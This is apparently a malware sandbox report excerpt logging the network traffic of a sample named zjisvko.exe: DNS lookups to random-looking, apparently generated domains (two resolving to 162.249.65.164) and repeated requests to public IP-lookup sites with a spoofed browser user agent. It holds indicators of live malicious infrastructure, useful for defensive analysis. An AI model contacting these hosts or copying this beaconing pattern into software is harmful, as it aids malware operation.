                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:18.175466061 CEST1.1.1.1192.168.11.300x25acName error (3)ufvxhp.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:18.309672117 CEST1.1.1.1192.168.11.300x1fbName error (3)xilsfdgn.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:18.443211079 CEST1.1.1.1192.168.11.300xc45fNo error (0)qkqsgqekyago.org162.249.65.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:21.650276899 CEST1.1.1.1192.168.11.300xf771Name error (3)jtbancuulki.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:21.953766108 CEST1.1.1.1192.168.11.300x967aName error (3)ykydrbpoxqpu.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.121715069 CEST1.1.1.1192.168.11.300xc967Name error (3)gorfnmtwasl.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.289572954 CEST1.1.1.1192.168.11.300xff19Name error (3)xnsamtpm.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.423259020 CEST1.1.1.1192.168.11.300x5ef2Name error (3)pfqdbsyn.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.657285929 CEST1.1.1.1192.168.11.300x2ebeName error (3)euuoqg.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.830053091 CEST1.1.1.1192.168.11.300xa16eName error (3)vtbcnjvmwj.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.966583967 CEST1.1.1.1192.168.11.300x74a3Name error (3)xfbeqk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:23.102112055 CEST1.1.1.1192.168.11.300xdaacName error (3)pgglnkael.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:23.312868118 CEST1.1.1.1192.168.11.300xb9f7No error (0)buakrgp.org162.249.65.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:26.549401999 CEST1.1.1.1192.168.11.300xe144Name error (3)xthmhc.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:26.760077953 CEST1.1.1.1192.168.11.300x8776Name error (3)ebzwtwgch.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:26.957865953 CEST1.1.1.1192.168.11.300xc2eName error (3)vispyytg.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:27.126580000 CEST1.1.1.1192.168.11.300x2cf8Name error (3)nifigom.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:27.260960102 CEST1.1.1.1192.168.11.300xc16aName error (3)nrayothh.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:27.397468090 CEST1.1.1.1192.168.11.300x44acName error (3)zncepwjkjm.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:27.580326080 CEST1.1.1.1192.168.11.300xab79Name error (3)rieoxvzxc.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:27.715879917 CEST1.1.1.1192.168.11.300x136aName error (3)ystygahkl.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    • whatismyipaddress.com
                                                                                                                                                                                                                                                    • www.showmyipaddress.com
                                                                                                                                                                                                                                                    • www.whatismyip.com
                                                                                                                                                                                                                                                    • www.myspace.com
                                                                                                                                                                                                                                                    • lwbjtptjlzji.net
                                                                                                                                                                                                                                                    • www.facebook.com
                                                                                                                                                                                                                                                    • xhjwwgwd.info
                                                                                                                                                                                                                                                    • wsmpvwxb.info
                                                                                                                                                                                                                                                    • www.imdb.com
                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    0192.168.11.3049799104.19.223.79807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:04.374111891 CEST181OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: whatismyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:04.516160965 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:04 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 4526
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                                                                                                                    Cache-Control: max-age=15
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 13:39:19 GMT
                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=vFT_S.l2plcgNSszqZxPOgQgiPFYZRZLMqFCJEEld24-1728999544-1.0.1.1-EHSRuxvkJWJuVBGRV2yjcQhyuF2aCJydUHQ.fgvhoPxOIwGJ2aKtAlKR4p9asN2ZjHAiiKfaAYh9bkpAawN5Gg; path=/; expires=Tue, 15-Oct-24 14:09:04 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d303690be74a530-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:04.516304970 CEST1289INData Raw: 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66
                                                                                                                                                                                                                                                    Data Ascii: ="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigat
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:04.516375065 CEST1289INData Raw: 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                    Data Ascii: captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-tr
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:04.516447067 CEST1260INData Raw: 6c 64 22 3e 38 64 33 30 33 36 39 30 62 65 37 34 61 35 33 30 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
                                                                                                                                                                                                                                                    Data Ascii: ld">8d303690be74a530</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-rev


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    1192.168.11.3049800172.67.155.175807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:05.798021078 CEST183OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.showmyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:05.944278955 CEST874INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:05 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:39:05 GMT
                                                                                                                                                                                                                                                    Location: https://www.showmyipaddress.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bOWlpkB%2BD4h6LTkzKg2CEm6CkeI2kdAyNftNuJzjiqp36mKM5jWDoJes55s0jlVH4jdBXrdG9q8MMt09fPc0tqQizBC4iTLSMlymi0OBKkRpFW7NLL2c7ee3KArWoOxWH6UUQx7IA1L8VA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d303699a8bc74a8-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    2192.168.11.3049803104.19.223.79807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:09.382644892 CEST181OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: whatismyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:09.546524048 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:09 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 4526
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                                                                                                                    Cache-Control: max-age=15
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 13:39:24 GMT
                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=M2pH.5UVAhNNH.Yyu5yQnmUkUHU1.4D.3YUCTYw3ECM-1728999549-1.0.1.1-bopzJkuMdqImAjFet6sYo5.tPvWEqFY0WB.rhS7ZHsCkPesBPsyaKg7hRqp5Zkdq2LgFJ0.rlPrvg8gHtx9Z9A; path=/; expires=Tue, 15-Oct-24 14:09:09 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3036b00e68335e-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:09.546600103 CEST1289INData Raw: 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66
                                                                                                                                                                                                                                                    Data Ascii: ="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigat
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:09.546659946 CEST1289INData Raw: 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                    Data Ascii: captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-tr
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:09.546806097 CEST1260INData Raw: 6c 64 22 3e 38 64 33 30 33 36 62 30 30 65 36 38 33 33 35 65 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
                                                                                                                                                                                                                                                    Data Ascii: ld">8d3036b00e68335e</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-rev


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    3192.168.11.3049804104.19.223.79807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:10.693607092 CEST181OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: whatismyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:10.855709076 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:10 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 4526
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                                                                                                                    Cache-Control: max-age=15
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 13:39:25 GMT
                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=F8.bHDjOmzZs_uMT4mduv7oWzIO0aOXmCGZTrVaisgw-1728999550-1.0.1.1-B2qV84GVsSKAa9RU2vMfVDryKr8SNGFbfclStkVH9jKPNe4EcI3MAzp7r7ebGlVDD12uGMXzOHZ0VosG1LRfaQ; path=/; expires=Tue, 15-Oct-24 14:09:10 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3036b838ecd9fd-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:10.855818987 CEST1289INData Raw: 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66
                                                                                                                                                                                                                                                    Data Ascii: ="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigat
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:10.855833054 CEST1289INData Raw: 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                    Data Ascii: captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-tr
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:10.856065989 CEST1260INData Raw: 6c 64 22 3e 38 64 33 30 33 36 62 38 33 38 65 63 64 39 66 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
                                                                                                                                                                                                                                                    Data Ascii: ld">8d3036b838ecd9fd</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-rev


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    4192.168.11.3049805104.27.206.92807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:12.154522896 CEST178OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.whatismyip.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:12.301763058 CEST855INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:12 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:39:12 GMT
                                                                                                                                                                                                                                                    Location: https://www.whatismyip.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MDFzuTpHslNMKOZAfDP0dZs6RIgg6T74jjmXhhgyimVBxhO7UTaizjZyghV1bF5JjhO1ASAo6HaRtDOUmZTLzgt%2Bx9Ce8WW%2Bnapx88cHe8Fqs1b%2Fsvupm6mDqtNIkUOciqhAsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3036c15cc65c69-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
